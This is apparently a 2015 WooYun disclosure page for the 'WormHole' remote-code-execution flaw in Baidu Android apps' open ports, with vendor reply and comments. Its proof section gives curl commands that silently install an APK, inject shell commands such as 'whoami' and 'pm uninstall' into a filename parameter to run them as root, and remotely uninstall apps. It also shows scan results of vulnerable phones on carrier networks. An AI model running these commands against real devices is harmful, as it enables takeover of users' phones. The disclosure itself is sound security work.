当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(164) 关注此漏洞

缺陷编号: WooYun-2015-148406

漏洞标题: WormHole虫洞漏洞总结报告(附检测结果与测试脚本)

相关厂商: 百度

漏洞作者: 瘦蛟舞认证白帽子

提交时间: 2015-10-21 17:46

公开时间: 2016-01-19 18:40

漏洞类型: 远程代码执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签: 客户端安全

28人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-21: 细节已通知厂商并且等待厂商处理中
2015-10-21: 厂商已经确认,细节仅向厂商公开
2015-10-24: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

wormhole

详细说明:

###已知受影响应用以及版本



---



code 区域
百度输入法  检测版本**.**.**.**
百度音乐 检测版本**.**.**.**
百度地图 检测版本8.7
百度手机助手 检测版本6.6.0
百度浏览器 检测版本**.**.**.**
手机百度 检测版本6.9
hao123 检测版本6.1
百度贴吧 检测版本6.9.2
百度云 检测版本7.8 (7.10 fixed)
百度视频 检测版本7.18.1
安卓市场 检测版本6.0.86
百度新闻 检测版本**.**.**.**
爱奇艺 检测版本6.0 (6.7 fixed)





http://**.**.**.**/bugs/wooyun-2015-0145365

http://**.**.**.**/bugs/wooyun-2015-0145718

http://**.**.**.**/bugs/wooyun-2015-0146617



对前面的漏洞总结,以及一些跟进情况.

###漏洞危害



---



1.该漏洞利用方法并不复杂,知道原理后即可轻松发起攻击



2.利用条件也不苛刻,只要是手机在联网状态都有可能受到攻击,无论是 wifi 无线网络或者3G/4G 蜂窝网络



3.此漏洞不受系统版本影响,在最新 android6.0上测试成功.



4.漏洞可以达到如下攻击效果



- 远程执行任意代码(可以达到 root 权限)

- 远程静默安装应用

- 远程启动任意应用

- 远程静默添加联系人

- 远程获取坐标位置信息/获取imei信息/获取应用安装信息

- 远程读取写入文件







###对蜂窝(3G/4G)网络检测结果



---



4G网络的 UE 检测 apn 结果如下



code 区域
123 && 123({"apn":"ctlte","subtype":"lte","error":0});





对4G 网络两个 C 段的40310/6259端口进行探测并且使用getserviceinfo判断其漏洞 app.(并没做其他攻击,测试发现3G 的 UE 与4G 的 UE 是互通的,运营商内网极其庞大)



code 区域
Discovered open port 40310/tcp on **.**.**.** com.baidu.searchbox
Discovered open port 40310/tcp on **.**.**.** com.baidu.BaiduMap
Discovered open port 40310/tcp on **.**.**.** com.baidu.searchbox_huawei (华为手机预装)
Discovered open port 40310/tcp on **.**.**.** com.baidu.searchbox
Discovered open port 40310/tcp on **.**.**.** **.**.**.**disk
Discovered open port 40310/tcp on **.**.**.**4 com.baidu.searchbox
Discovered open port 40310/tcp on **.**.**.** com.baidu.searchbox
Discovered open port 40310/tcp on **.**.**.** com.baidu.searchbox
Discovered open port 40310/tcp on **.**.**.** "com.baidu.tieba"

---
Discovered open port 6259/tcp on **.**.**.** com.baidu.searchbox_huawei
Discovered open port 6259/tcp on **.**.**.** com.baidu.BaiduMap
Discovered open port 6259/tcp on **.**.**.** com.hiapk.marketpho
Discovered open port 6259/tcp on **.**.**.** com.baidu.input
Discovered open port 6259/tcp on **.**.**.** com.baidu.BaiduMap

---

Discovered open port 6259/tcp on **.**.**.** "packagename":"com.baidu.searchbox","version":"19"
Discovered open port 6259/tcp on **.**.**.** "packagename":"com.baidu.appsearch"
Discovered open port 6259/tcp on **.**.**.** "com.hiapk.marketpho","version":"121"
Discovered open port 6259/tcp on **.**.**.** "packagename":"com.hiapk.marketpho"
Discovered open port 6259/tcp on **.**.**.** "com.baidu.browser.apps","version":"121"
Discovered open port 6259/tcp on **.**.**.** "com.qiyi.video","version":"20"
Discovered open port 6259/tcp on **.**.**.** "com.baidu.appsearch","version":"121"
Discovered open port 6259/tcp on **.**.**.** "com.baidu.input","version":"16"
Discovered open port 6259/tcp on **.**.**.** "com.baidu.BaiduMap","version":"20"
Discovered open port 6259/tcp on **.**.**.** "com.baidu.appsearch","version":"121"
Discovered open port 6259/tcp on **.**.**.** "com.hiapk.marketpho","version":"21"

---

Discovered open port 40310/tcp on **.**.**.** "com.baidu.BaiduMap","version":"122"
Discovered open port 40310/tcp on **.**.**.** "com.ting.mp3.android","version":"122"
Discovered open port 40310/tcp on **.**.**.** "com.baidu.searchbox","version":"122"
Discovered open port 40310/tcp on **.**.**.** "com.baidu.BaiduMap","version":"122"
Discovered open port 40310/tcp on **.**.**.** file not found (netdisk fixed version)
Discovered open port 40310/tcp on **.**.**.** "packagename":"com.baidu.searchbox"

漏洞证明:

###远程执行 root 命令

code 区域
curl -F [email protected] -e http://**.**.**.** -H "remote-addr: **.**.**.**" **.**.**.**:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk





已经有了远程静默安装的 poc,因为是带入 exec 方法,并且使用拼接的方式,那么就考虑考虑截断远程执行命令了.



code 区域
curl -F [email protected] -e http://**.**.**.** -H "remote-addr: **.**.**.**" **.**.**.**:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk\'\;\'whoami





root.jpg





附带一个更有意思的 exp,替换百度浏览器为 UC 浏览器



如果用户没有 root 权限,可以使用如下 poc提示协助.



code 区域
curl -e http://**.**.**.** -H "remote-addr: **.**.**.**" **.**.**.**:40310/sendintent?callback=123&mcmdf=inapp_xxx&intent=intent%3Apackage%3Acom.baidu.browser.apps%23Intent%3Baction%3Dandroid.intent.action.DELETE%3Bend





uninstall.png





如果 root 了那就可以静默完成这些了...



code 区域
curl -F [email protected] -e http://**.**.**.** -H "remote-addr: **.**.**.**" **.**.**.**:40310/uploadfile\?install_type\=all\&callback\=123\&mcmdf\=inapp_123\&Filename\=1.apk\'\;pm%20uninstall%20\'com.baidu.browser.apps





uc.png





本意是协助百度尽快修复漏洞,所以提供了一个检测脚本在测试代码中.

修复方案:

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-10-21 18:30

厂商回复:

感谢您对百度安全你的关注,此漏洞已知晓且mo + sdk已修复

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-10-21 17:52 | 玉林嘎 认证白帽子 ( 普通白帽子 | Rank:941 漏洞数:108 )
    0

    前排!

  2. 2015-10-21 17:54 | 故滨 ( 普通白帽子 | Rank:311 漏洞数:40 )
    0

    这个不应该是cncert吗,怎么变成百度了

  3. 2015-10-21 19:08 | Mark0smith ( 普通白帽子 | Rank:172 漏洞数:68 | 我要是再正常一点就好了)
    0

    wow

  4. 2015-10-28 12:39 | 蚕豆网(乌云厂商)
    0

    速度真快

  5. 2015-10-28 13:57 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)
    2

    这个要打雷 给$ 置顶阿。。 用户超亿了

  6. 2015-10-28 19:28 | zzzmode ( 路人 | Rank:7 漏洞数:2 | )
    1

    libBdMoplusMD5_V1.so 出问题了?

  7. 2015-10-29 02:36 | 麻辣烫 ( 路人 | Rank:27 漏洞数:10 | wooyun是一个学习的好地方.)
    0

    http://zone.wooyun.org/content/23346

  8. 2015-10-29 11:25 | 小杰哥 ( 普通白帽子 | Rank:251 漏洞数:35 | 我不是 T0n9 和 [email protected] 的大号!)
    0

    @xsser_w 你暴露了 两个都是你发的?

  9. 2015-10-29 17:35 | xsser_w ( 普通白帽子 | Rank:116 漏洞数:34 | 哎)
    0

    @小杰哥 不是阿 是路人甲发的

  10. 2015-10-29 18:36 | liutao0532 ( 路人 | Rank:18 漏洞数:8 | b.b.b)
    3

    百度全家桶现已加入豪华午餐

  11. 2016-01-19 19:30 | Arthur ( 实习白帽子 | Rank:85 漏洞数:35 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~)
    0

    这个不是漏洞,就是个后门啊

  12. 2016-01-19 23:30 | 圣路西法 ( 路人 | Rank:22 漏洞数:8 | 围观大神ส็็็็็็ ̷̸̨̀͒̏̃ͦ...)
    0

    这个简直凶残。

登录后才能发表评论,请先 登录